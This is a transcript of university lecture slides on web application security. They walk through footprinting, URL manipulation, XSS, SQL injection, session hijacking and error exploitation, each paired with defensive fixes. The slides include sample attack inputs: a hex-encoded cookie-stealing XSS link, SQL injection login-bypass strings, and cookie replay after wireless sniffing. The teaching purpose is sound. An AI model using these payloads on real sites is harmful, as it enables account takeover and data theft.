Securing Web Applications - PowerPoint PPT Presentation

1 / 37
About This Presentation
Title:

Securing Web Applications

Description:

Min Song IS/CS698 Application Security Applications are part of your security perimeter. Application Security Attackers won t attack your firewall. – PowerPoint PPT presentation

Number of Views:227
Avg rating:3.0/5.0
Slides: 38
Provided by: webNjitE6
Category:

less

Transcript and Presenter's Notes

Title: Securing Web Applications


1
Securing Web Applications
  • Min Song
  • IS/CS698

2
Application Security
  • Applications are part of your
  • security perimeter.

FIREWALL
BUSINESS
INTERNET
3
Application Security
  • Attackers wont attack your firewall.
  • Theyll attack your applications.

FIREWALL
BUSINESS
INTERNET
4
Application Security
  • or theyll walk through the door
  • (developers, administrators, users)

FIREWALL
BUSINESS
INTERNET
5
Application Security
  • or maybe just listen at the door (wireless,
    newsgroups, job ads)

FIREWALL
BUSINESS
INTERNET
Information Leaks
6
Web Application Exploits
  • Footprinting
  • URL Manipulation
  • Cross-Site Scripting (XSS)
  • SQL Injection
  • Session Hijacking
  • Error Exploitation

7
Footprinting
  • CNN mentions your website
  • Instant traffic jam
  • Database gets overloaded and goes down
  • Web application cant get a connection
  • (Developer couldnt do much about it, so the code
    lets it bubble up to the server)
  • The user sees a big, ugly Tomcat error message
    with all the gory details

8
Footprinting in Action
  • Pointy-haired boss
  • Finds it annoying and unprofessional
  • Calls you in to interpret technical mumbo-jumbo
  • Knowledgeable user
  • Learns which server versions are running
  • Learns the name of JavaServer Pages (JSPs) and
    other code components
  • Learns details about the database structure and
    naming

9
Footprinting in Action
  • Attacker
  • Looks up server vulnerabilities
  • Tries accessing default server config pages
  • Tries to cause other kinds of errors to collect
    more information
  • Tries SQL injection attack
  • Uses information to appear in-the-know during
    social engineering attack

10
Footprinting Flavors
  • Errors (default application server behavior
    prints out all the ugly details)
  • HTTP Response Headers
  • Powered by logos
  • Distinctive URL patterns
  • Default stylesheets/skins
  • Press releases
  • Job ads
  • Newsgroup or message board postings

11
Footprinting Fixes
  • Configure default server-level error pages
  • Test what happens when
  • Resources are unavailable
  • Pages are not found
  • Bugs cause unhandled exceptions
  • Dont give details about errors the user cant
    fix (where possible, dont even admit that
    theyre unexpected)
  • Dont give out specific product/version
    information, either in error messages or
    advertisements

12
URL Manipulation
  • User gets an email notification with an
    invitation to visit her online profile at
  • http//www.acme.com/profile?userid2249
  • Cuts and pastes the link into the browser
  • Accidentally leaves off the 9
  • http//www.acme.com/profile?userid224
  • Gets a page with somebody elses personal
    information

13
URL Manipulation in Action
  • Pointy-Haired Boss
  • Gets confused
  • Starts worrying about his own privacy
  • Knowledgeable user
  • Removes her own personal info immediately
  • Gets curious and looks through the other persons
    information
  • Tries a few more IDs to see what happens

14
URL Manipulation in Action
  • Attacker
  • Looks for other URLs on the site that can be
    manipulated
  • Finds admin functionality that shouldnt be
    available
  • Writes a script to scrape confidential
    information
  • Tries to guess other peoples usernames and
    passwords based on their personal details
    (username, birthday, etc.)
  • Uses personal info to impersonate others
  • Calls users and poses as company representative
    who is looking at the same profile screen and
    needs to confirm username and password
  • Asks company for ransom
  • Uses email addresses to launch cross-site
    scripting attacks against users

15
URL Manipulation Flavors
  • Manipulating cookies
  • Manipulating form data
  • Both POSTs and GETs
  • Hidden form fields
  • ltselectgt values
  • Fishing for errors (footprinting)
  • Fishing for directory listings
  • Fishing for admin pages
  • Fishing for temp files (index.old, index.html)

16
URL Manipulation Fixes
  • Never trust client-side information
  • If you must rely on client-side tokens, sign and
    encrypt them
  • Use programmatic security checks to implement
    row-level security
  • Store authentication details in server-side
    session, or re-check every time
  • Watch out for temp files

17
Cross-Site Scripting (XSS)
  • John visits an online bookstore
  • He copies the following book title from an HTML
    email message
  • ltbgtArchitects Checklistlt/bgt
  • Pastes it into the search box
  • Website displays search terms in bold along with
    results

18
XSS In Action
  • Knowledgeable user
  • Plays with search terms to see what else can get
    through
  • Attacker
  • Tries entering JavaScript and watches it get
    executed when the form is submitted
  • Looks at the name of the search form field and
    figures out how to specify it through the URL
  • Sends an IM to a friend with a link that goes to
    that site and displays a funny pop-up saying
    Youve been hacked!

19
XSS In Action
  • Attacker
  • Constructs some JavaScript that reads a cookie
    and resubmits it to a different site (under his
    control)
  • Hex encodes it so its not obvious in a URL
  • http//ebay.com/SendFeedback?feedback223e3c7
    363726970743e646f63756d656e2e6e
  • Emails the link to hundreds of users with a
    message asking them to participate in a survey
  • Expects many of them to click the link
  • Expects that many of them are configured to
    auto-login
  • Collects cookies as theyre sent to the site
  • Logs in and uses their accounts

20
XSS Flavors
  • Code Flaws
  • Feedback, reviews, message boards, etc.
  • Error messages that quote user input
  • Search results (w/terms)
  • Public user profiles
  • Trusted partner content
  • Exploits
  • Cookie/session theft
  • Execution of fraudulent transactions
  • Access to confidential information

21
XSS Fixes
  • Validate all user input
  • Never redisplay user input without cleaning out
    any HTML and JavaScript
  • Filter out whatever you can
  • If you must display it verbatim, escape all of
    the characters or display them within ltpregt tags
    so that the browser wont interpret them

22
SQL Injection
  • Erin visits a site and searches for
  • Architects Checklist
  • She gets an error that says
  • Sorry, an unexpected error has occurred
  • Invalid SQL Syntax

23
SQL Injection in Action
  • Pointy-haired boss
  • Tries the search again
  • Assumes site is broken
  • Knowledgeable user
  • Realizes that the single quote is often used in
    SQL statements to surround text
  • Tries searching for architect checklist
  • Gets results

24
SQL Injection in Action
  • Attacker
  • Views the HTML source for the page to look for
    field names that might match the database columns
  • Imagines the SQL to be something like
  • select name, isbn from book where name like
    architects checklist
  • Gets full list by searching for foo or name
    like
  • Tries logging in as foo and gets the error
  • Tries logging in as
  • Username foo
  • Password bar or usernameadmin
  • Gets a page that says Welcome, admin

25
SQL Injection Flavors
  • Code for advanced searches and other criteria
    screens constructs query using string
    concatenation
  • Authentication module constructs login query
    using string concatenation
  • Database or driver doesnt bind parameters

26
SQL Injection Fixes
  • Use PreparedStatements
  • Validate all user info
  • Strip out special characters
  • Never display SQL error messages to user
  • Use different field names for user interface and
    database
  • Turn off unused database features
  • Limit database user privileges

27
Session hijacking/replay
  • What a boring presentation
  • Brian pops open his laptop and connects to the
    hotels wireless network
  • Browses his web mail

28
Session hijacking in Action
  • Attacker
  • Fires up a wireless cracking program like Kismet
  • Watches Brians information go by
  • Notices him making requests to a web-based mail
    service
  • Reads his email as it goes by

29
Session hijacking in Action
  • Attacker (continued)
  • Wonders what other mail Brian keeps on the server
  • Grabs Brians session cookie as it goes by
  • Makes her own request to the mail server with
    that cookie and is automatically logged in
  • Reads through Brians saved messages to find all
    sorts of usernames and passwords

30
Session hijacking Flavors
  • Network sniffing
  • To be fair, a lot of the 802.11 problem is on
    Brians side, since hes browsing in the clear
    over airwaves
  • Cookie Theft (e.g. through XSS)
  • Brute forcing session IDs
  • Trying over and over until a valid session is
    found
  • Computing the next session ID by observing the
    algorithm the server uses to generate them

31
Session hijacking Fixes
  • Run everything over HTTPS
  • At least, run all confidential information over
    HTTPS
  • Dont write your own simple session management
  • If you do write something
  • match session key to IP address
  • alter session on every request so that you can
    detect duplicates

32
Error exploitation
  • Erin visits a travel site and starts browsing for
    8-day Alaskan cruises
  • She finds one she likes and sees that there are
    40 cabins left
  • She starts to book the only remaining deluxe
    cabin, but her credit card is declined
  • She tries to rebook with a different credit card,
    but the deluxe cabin is taken

33
Error exploitation in Action
  • Pointy-haired boss
  • Books an Economy cabin
  • Knowledgeable user
  • Calls to verify that its not still reserved
    based on her aborted booking attempt
  • Finds out that the cabin was accidentally
    reserved and is really available

34
Error exploitation in Action
  • Attacker
  • Books a bunch of cabins
  • Using fake credit card numbers
  • Through an anonymous web redirector
  • Waits to see how long it takes for the company to
    realize they werent really booked
  • Calls at the last minute and gets a great deal
    since theyre so undersold

35
Error exploitation Flavors
  • Time-consuming processes
  • Reliance on cached values of prices or other data
    (that may have been manipulated)
  • Broken/misconfigured transactions
  • Multiple operations may not be correctly grouped
    into transactions
  • Transaction rollback may leave the database
    consistent, but not revert changes to cached data
    or other application state

36
Error exploitation Fixes
  • Ensure that all modification is transactional
  • Be careful that cached values are properly
    flushed when transactions roll back
  • Enforce performance goals
  • Watch logs for unusual error patterns (automate
    this!)

37
Always remember
  • Dont trust or display user input until youve
    cleaned and validated it
  • Dont use HTML comments to describe dynamic code
  • Keep control over your error messages
  • Dont advertise details about your network,
    servers, databases or code
  • Implement row-level security
  • Log everything (and analyze the logs)
Write a Comment
User Comments (0)
About PowerShow.com